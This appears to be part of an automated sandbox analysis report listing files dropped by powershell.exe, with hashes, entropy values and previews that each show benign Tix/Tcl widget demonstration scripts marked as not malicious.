                                                                                                                                                                                                              MD5:E587C6CEFC86B2EA0F6A51A91CD877C2
                                                                                                                                                                                                              SHA1:F15E8360EDA1D1E426CEB9B75A61B64BFE231D3D
                                                                                                                                                                                                              SHA-256:8441A5C63A17C64DD25F1E0D4EC18F9BBF404B123A3B99028D3D24E4C7729AAE
                                                                                                                                                                                                              SHA-512:195C4BA83B682079AEFC4C29BA458CA3A21C74D4CFF1F881FBC36AEEC6BD465F236E83D815D64DA8502EAE505A7F28A2A19D46B12B726D5498775EADFAB7DAD3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: LabFrame.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixLabelFrame widget -- a frame that..# come with a label at its side. It looks nifty when you use the set the..# -labelside option to "acrosstop". Note that a lot of Tix widgets, such..# as tixComboBox or tixControl, have the -labelside and -label options. So..# you can use these options to achieve the same effect as in this file..#....proc RunSample {w} {.... # Create the radiobuttons at the top of the dialog box, put them.. # inside two tixLabelFrames:.. #.. frame $w
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3026
                                                                                                                                                                                                              Entropy (8bit):4.726793787987951
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ayXvLTfyEZQ1ti27u28ARfz0eBfDHlrRSTRSl+QpralrRSTRSl+fiAD4H5PflmrX:pfLTv2f6QloMRp3Muipf0R+3i
                                                                                                                                                                                                              MD5:68B91FCE4A7D4BFBF82D1D01BDA730D1
                                                                                                                                                                                                              SHA1:4B3D09D822C04554921305BCB3A2E66553E1A23F
                                                                                                                                                                                                              SHA-256:C572F3AFD878913DF6567C94C0FDB5C4257097FC1B93549F8A1302060F04484F
                                                                                                                                                                                                              SHA-512:0A6BE935014A80D79E2F36776C164ABB2C12C08796F47766C2F5585D4E6FCCB510D986EDD52E48813BB9D5586E567F5CAFE20EFA10ECA2DAE344B24B63DAB7B4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:#..#.$Id: ListNBK.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This program demonstrates the ListBoteBook widget, which is very similar..# to a NoteBook widget but uses an HList instead of page tabs to list the..# pages.....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... #----------------------------------------------------------------------.. # Create the ListNoteBook with nice icons.. #----------------------------------------------------------------------.. tixListNoteBook $top.n
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2242
                                                                                                                                                                                                              Entropy (8bit):4.836474506103817
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:fdyXvCtfyEZQ1/qUgdPd55Ppz1nS9wUEj9RB2GFzRoqCKcrpPEDDZP1Rs9v:sfiv2CbFnH7zIrc3Ov
                                                                                                                                                                                                              MD5:8FCC60F1C74C46D3A98887E9CB4B9424
                                                                                                                                                                                                              SHA1:569CD0060FAE329FF28F9D3F9C6F26D7A488921B
                                                                                                                                                                                                              SHA-256:80C41B77B7DE14AD5A0F6D91F3722912DCBEB5B04FA2FA040F7AAB013EA1D12E
                                                                                                                                                                                                              SHA-512:8190610743F9FCA8415D07E6968F9075D2170657B98C2F9EF7B3165B9FDCD1A4F37D96DC325FF69F2F69DD31C5C56046C32D01304C46CAC0075AF61C29B61157
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Meter.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This program demonstrates the use of the tixMeter widget -- it is..# used to display the progress of a background job..#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... # Create the Meter and the Label.. #.. label $top.lab -text "Work in progress ....".. tixMeter $top.met -value 0 -text 0%.... pack $top.lab -side top -padx 50 -pady 10 -anch
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3711
                                                                                                                                                                                                              Entropy (8bit):4.753391223190939
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:IcdyXv94eBfpsbXX44dgd+rWQD4MPviu53P2Q54nYlr9STRSl++xGBCZ54Nlr9S9:IXf9NygwDvaBcDpaYcX9Sn3U9753Ov
                                                                                                                                                                                                              MD5:16BC78A2C939681CC55CA50D48498DE0
                                                                                                                                                                                                              SHA1:1C395DA84A7751626176293D2C6F7B8756CB5D8C
                                                                                                                                                                                                              SHA-256:26C4D9CFCD0DD1FBCE26F84B060DA7E785F855910BBB8744ABBB8A301505546B
                                                                                                                                                                                                              SHA-512:817D21A6206D89E216E221B5F018BFB2715A2349C936987B321EB38EC68BE2748E7B9A0C90F4D76444A9C3AB7498405E747CF7014623DA8A6C64FB84C8744E62
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: NoteBook.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixNoteBook widget, which allows..# you to lay out your interface using a "notebook" metaphore..#....proc RunSample {w} {.... # We use these options to set the sizes of the subwidgets inside the.. # notebook, so that they are well-aligned on the screen... #.. set name [tixOptionName $w].. option add *$name*TixControl*entry.width 10.. option add *$name*TixControl*label.width 18.. option add *$name*TixControl*label.anchor e.... # Create the notebook widget and
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3250
                                                                                                                                                                                                              Entropy (8bit):4.866384029598316
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:7yXvm31KvtM7GUlT86NbLGfbnwcqTU41A8tPO9fZXr4ks1a5HKjteiP1Rs9v:+fmOMaUllBGzJW7tPQfZXdoaYjt93Ov
                                                                                                                                                                                                              MD5:ED091E549D7BDA015D2424199758CE31
                                                                                                                                                                                                              SHA1:59ECD67575AA6F2C24679A6FE14FC10CA22FBD16
                                                                                                                                                                                                              SHA-256:E9DB817C08731F0A67DC7351502BA046BECE067E781E910FC2FA0D4094557352
                                                                                                                                                                                                              SHA-512:3CAA4EA82906872329B951FFE2FD12B7382BA098B1CBA679178F5340659E1A2B462441A0497F31D81F09F97C9DCECA7084ADFA827DEB1BB40627D9F515E0A3EC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: OptMenu.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixOptionMenu widget -- you can..# use it for the user to choose from a fixed set of options..#..set opt_options {text formatted post html tex rtf}....set opt_labels(text).."Plain Text" ..set opt_labels(formatted)."Formatted Text"..set opt_labels(post).."PostScript"..set opt_labels(html).."HTML"..set opt_labels(tex).."LaTeX"..set opt_labels(rtf).."Rich Text Format"....proc RunSample {w} {.. catch {uplevel #0 unset demo_opt_from}.. catch {uplevel #0 unset demo_opt_to }....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4335
                                                                                                                                                                                                              Entropy (8bit):4.844259286586952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:MfSIOlL5uLOXklfZoXomIWpJpkgtYYVKgly93Oa:MqI85uLOXkxZVmhJWgtRwN
                                                                                                                                                                                                              MD5:5C95147C58A1BF4E731B52E69CDF14C7
                                                                                                                                                                                                              SHA1:5464370EBDD4E77894CFD5056F4A06A98216E69E
                                                                                                                                                                                                              SHA-256:009A882ECABC3ADA6E381D4D6EF0118BFDB6D1F7FC7BC6D3DBC5BAA7FAB47651
                                                                                                                                                                                                              SHA-512:6CC4755ED0831572AA28FFB5A7C106EAE647D964A14584808A685CE64485B553290B3F3ABDD6A21FE177AF870331E5AFCDAB9ABECAFEEB95DE42BD921DCDBBBD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: PanedWin.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixPanedWindow widget. This program..# is a dummy news reader: the user can adjust the sizes of the list..# of artical names and the size of the text widget that shows the body..# of the article..#....proc RunSample {w} {.... # We create the frame at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Use a LabelEntry widget to show the name of the newsgroup.. # [Hint] We disable the entry widget so that the user can't.. # mess up with the name
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2436
                                                                                                                                                                                                              Entropy (8bit):4.7618158195051565
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:NyXv7LTS1t78uYwD436nU4HneIsAtIn5tRr9fZWjr4ksJHeiP1Rs9v:kf7LO1S736XNCHpfZKdW93Ov
                                                                                                                                                                                                              MD5:0803EE80C521B64552773C540098DEA0
                                                                                                                                                                                                              SHA1:9586121D8BE29AB521D0EFAA6877175D681F71CD
                                                                                                                                                                                                              SHA-256:0E9D20C60E5FFCFAD32B3DC011CC36071C722ED10188B0732C2C0E7AF3E18AFA
                                                                                                                                                                                                              SHA-512:89218A3A48A92D372417F150D9A0BA358990D676F71881B2803E81761644BC6FF4D48004276F8AE3B7449EFFE14A6E04C99EC5F85D15D91B5EA056287871C2D5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: PopMenu.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixPopupMenu widget...#....proc RunSample {w} {.... # We create the frame and the button, then we'll bind the PopupMenu.. # to both widgets. The result is, when you press the right mouse.. # button over $w.top or $w.top.but, the PopupMenu will come up... #.... frame $w.top -relief raised -bd 1.... button $w.top.but -text {Press the right mouse button over..this button or its surrounding area}.... pack $w.top.but -expand yes -fill both -padx 50 -pady 50.... ti
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3573
                                                                                                                                                                                                              Entropy (8bit):4.807340044913598
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:gyXvWrW7fyEZQ1NMv2U5PflmrJxvTqE/YQD0E1WehoiT1NAVDr9udgB/bDZ1Ii1W:7fWQv2ZKf0X2Mh1hoI1GUgpp1PaZjC3i
                                                                                                                                                                                                              MD5:3AC35BDAC135A07B29E71C4674F7FA22
                                                                                                                                                                                                              SHA1:378DC41AD0470779C504A90E521E34A85FDBCA4C
                                                                                                                                                                                                              SHA-256:988106B37C6E5993693D18A03368D0E1A84B8F95114B1832201C6361FF3C9E1C
                                                                                                                                                                                                              SHA-512:5A2E5C4E6A81BACBEF794425CDB1E20628D0C493A3C57AA0F4C7556458498C95B4FEF18F5D3372C75AA1EBB9641073E234B802D6FF67764DFC43C450CE3F78B7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SGrid0.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# A very simple demonstration of the tixGrid widget..#....proc RunSample {w} {.. wm title $w "The First Grid Example".. wm geometry $w 480x300.... set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... label $top.lab -text "This widget is still under alpha..Please ignore the debug messages..Not all features have been implemented" -justify left.. pack $top.lab -side top -anchor
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5633
                                                                                                                                                                                                              Entropy (8bit):4.926067037867941
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:lGfN2v2ZKf0XPg2yghD1jf1GUg2WqVpPaZjauWgncmU3i:oa2ZY4PSghDFZg2RjaZjauPUy
                                                                                                                                                                                                              MD5:F1ABEDE140BC7048EB8E8DDBB6E50460
                                                                                                                                                                                                              SHA1:1A8C3546E11AA6F541E04789368ED6A006C65C3A
                                                                                                                                                                                                              SHA-256:CB0388C09B46AEB8828B36E6C3DD804456339731346C4839B2D6E87ABA31E6C8
                                                                                                                                                                                                              SHA-512:0969A92641CCBE9A8526E8A34CD5219CE9460DBAF2B0D596D0E2B7A9F410880067BD13D7F147F80039019EB24DC281674798FBF1C2FCB02007200067D7F7F99D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SGrid1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the tixGrid widget..#....proc RunSample {w} {.. wm title $w "Doe Inc. Performance".. wm geometry $w 640x300.... set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... label $top.lab -text "This widget is still under alpha..Please ignore the debug messages..Not all features have been implemented" -justify left.. pack $top.lab -side top -anchor c -padx 3 -pady 3..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3208
                                                                                                                                                                                                              Entropy (8bit):4.882344453850518
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:kyXv+TSQlu+AeD7I64XB10P3yT446xGQwjg+CCIQKz9fZWjr4ksJHeiP1N:3f+OQlJAjzT04ywjg+L4fZKdW9/
                                                                                                                                                                                                              MD5:224E6F60D7E68BE97AF5DECA922C89C7
                                                                                                                                                                                                              SHA1:72EACE1E07BF27810867BED887D1A31E305B0285
                                                                                                                                                                                                              SHA-256:5884FEA04EC99096D649AD1C7D389D179C05B6CDD5641667270C1E2B73D3990C
                                                                                                                                                                                                              SHA-512:D8CF16D02FD0BE93A9DBA3E3C814ED1FF87EF9528FA0AEF3CCD99F91D1C76A1521B7374B25267DB5E7E745E822380D3F9BA4C5F50E366E83F0C9BEF44553F907
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SHList.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledHList widget...#....proc RunSample {w} {.... # We create the frame and the ScrolledHList widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Put a simple hierachy into the HList (two levels). Use colors and.. # separator widgets (frames) to make the list look fancy.. #.. tixScrolledHList $w.top.a.. pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left...... # This is our little relational database.
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5092
                                                                                                                                                                                                              Entropy (8bit):4.827384096302168
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:2fJQlJB29Y9wuJJ71yjNVXjsGs4fZKdW9/:2R8BQYKuJaoGsqZf/
                                                                                                                                                                                                              MD5:9008C122AAC052DEFBC0001EF2522904
                                                                                                                                                                                                              SHA1:2C6129114D4CED51D04DE8DA59B5150C04276D4C
                                                                                                                                                                                                              SHA-256:C4F0A6C494C789B5E5B5F3CE4454B116DA9A57B92CAAE28EA767280E1FD66F55
                                                                                                                                                                                                              SHA-512:FE1CEB2E729C52B1FB3199E80F030920FBC4218779FB531E3E06301C4BBB4AC958A5F63446088C6F294015BDDE8790837E81CE2D41CA9C216740E02DC731F533
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SHList2.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to use multiple columns and multiple styles..# in the tixHList widget..#..# In a tixHList widget, you can have one ore more columns. ..#....proc RunSample {w} {.... # We create the frame and the ScrolledHList widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Put a simple hierachy into the HList (two levels). Use colors and.. # separator widgets (frames) to make the list look fancy.. #.. tixScrolledHList $w.top.a -options {...hlist.col
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2949
                                                                                                                                                                                                              Entropy (8bit):4.865670603629745
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:QN3yXvs6TSk1Rlu2NMD7U4y1qhD7HRB3XFP0Fjpurx0+qkUFPN9fZWjr4ksJHeir:hfPOElCX7lP50+q9PzfZKdW93b
                                                                                                                                                                                                              MD5:D2AD1D9F757B3C4C9DA13DA44D8B99F1
                                                                                                                                                                                                              SHA1:025B10F7C9DD84CBB17C6D74E45D20B0F538A13D
                                                                                                                                                                                                              SHA-256:2B2735CBB38B8732AA0C6F21CD551DABA46B7F87AF90DACDB62CE1E504CB2B8A
                                                                                                                                                                                                              SHA-512:A1ED26F03EA3DB1630F72D496882D853464B563875810B91F26A6E781D09BA67144BD5A5AC9DB43ABE1AFDF6BEF31E3083D631B64A22AE91A0C95853AB5C01CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SListBox.tcl,v 1.4 2008/02/27 22:17:27 hobbs Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledListBox widget...#....proc RunSample {w} {.... # We create the frame and the two ScrolledListBox widgets.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # The first ScrolledListBox widget always shows both scrollbars.. #.. tixScrolledListBox $w.top.a -scrollbar both.. pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left.... # The second ScrolledListBox widget shows the scrollbars only when.. # needed...
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):1612
                                                                                                                                                                                                              Entropy (8bit):4.748365090211464
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:YAyXv9VfyEZQ1/MBvD7Jnm51qrSRtr5PflmrJMP1Ri:Ybffv22OxVf0a3i
                                                                                                                                                                                                              MD5:6F2DF668A2BB5F7E1F9C7D686C041C9B
                                                                                                                                                                                                              SHA1:30066558B68EE25448A173D973CD33E5349D7D6C
                                                                                                                                                                                                              SHA-256:95D4EE51467F8B4F8EA2EC1031F122181F12F66A1F408D343C55C4C6B5150F3D
                                                                                                                                                                                                              SHA-512:6021AE76A92A44D0D4D5B66C488361C82D1DAE042480616F9EC8986128DFB3CE959F1246F3F1FD5CEA17EFB4580A8D88C0985FA2E56FAAC462FE228FF2FA5E26
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: STList1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the scrolled tlist widget..#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... # Create the scrolled tlist.. #.. tixScrolledTList $top.st -options {...tlist.orient vertical...tlist.selectMode single.. }.. pack $top.st -expand yes -fill both -padx 10 -pady 10.... # Insert a list of numbers into the tlist subwidget.. #..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2473
                                                                                                                                                                                                              Entropy (8bit):4.750201603410602
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N+yXv9VfyEZQ1/Nd4D0Lvlh/dBuRD7VBMiD7X9lm51qrSCOtGtr5PflmrJMP1Ri:NVffv2VHZ1uBMFPQVf0a3i
                                                                                                                                                                                                              MD5:4E51CB057BFC9D68DFAB66BD4E955AC0
                                                                                                                                                                                                              SHA1:9312E6F4A6D2B956E4A8C46B8A3C6B023A4C1650
                                                                                                                                                                                                              SHA-256:A96ED8063A1579C0895B9AE8D93E77DE2120D93FE751A4FEA58D2BABBFF1B20B
                                                                                                                                                                                                              SHA-512:A2748A17D4E89EBFCB9F729BD044F4F7EBEEFE85B554673A96F89166687F80473BC56250537414F29D0426226D83223BCB5179D828BF83D13BBB5BE5177B4ABF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: STList2.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the scrolled tlist widget..#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... # Create the Paned Window to contain two scrolled tlist's.. #.. set p [tixPanedWindow $top.p -orient horizontal].. pack $p -expand yes -fill both -padx 4 -pady 4.... set p1 [$p add pane1 -expand 1].. set p2 [$p add pane2 -expand 1].... $p1 conf
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3090
                                                                                                                                                                                                              Entropy (8bit):4.740422134863133
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Zfbv2yHZo3gP8PfgusvRlTaIX4fR90e53i:Zz2yH63Ko9svRp1X4fR906y
                                                                                                                                                                                                              MD5:BACE70A83588DA901A08B0869A57A20C
                                                                                                                                                                                                              SHA1:6D1DE3BFE3A0B90FC6E5DC662C5434F9BF6ED1E9
                                                                                                                                                                                                              SHA-256:B7F04FC61AAA7167BF7C1AA8BE5BA59556015E30B084F1EAB9A5F040AC4D9D3A
                                                                                                                                                                                                              SHA-512:EB8E6242475A01EECAC63C786B087379A2662CB57877860B3BF350A24B50EBC4928FF358C86D371BA26C2F5F8FC1C33A20B2F37E838329F1DBB468088B6615AF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: STList3.tcl,v 1.4 2004/03/28 02:44:56 hobbs Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the use of DirTree with the TList ..#....proc RunSample {w} {.. set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... # Create the Paned Window to contain the dirtree and scrolled tlist.. #.. set p [tixPanedWindow $top.p -orient horizontal].. pack $p -expand yes -fill both -padx 4 -pady 4.... set p1 [$p add pane1 -expand 1].. set p2 [$p add pane2 -expand 4]..
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2617
                                                                                                                                                                                                              Entropy (8bit):4.7775925732113995
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:PyXvXTSNluNBeD7P9fZWjr4ks1CCjpmNg/QsYH4VKflxeiP1Rb:afXONlkMfZKdoPpkgXYYVKflx93b
                                                                                                                                                                                                              MD5:58BF72EC201AFE126458D2C761624052
                                                                                                                                                                                                              SHA1:C38F22BD62ADA978E2DB0E677BD719FFACB5880B
                                                                                                                                                                                                              SHA-256:215B50D920B10740ACC10DDF4F6EBFE5123EF8806D5099C1906D424CDACA0525
                                                                                                                                                                                                              SHA-512:B7783001CFC6A70FA73D02300797F57D421561CAC0665F10C57671E484D7F8EF35EC412EC7E745FC62C6BAD0F9C7BD7681E451F30FACDB4D53299322CA799838
                                                                                                                                                                                                              Malicious:false
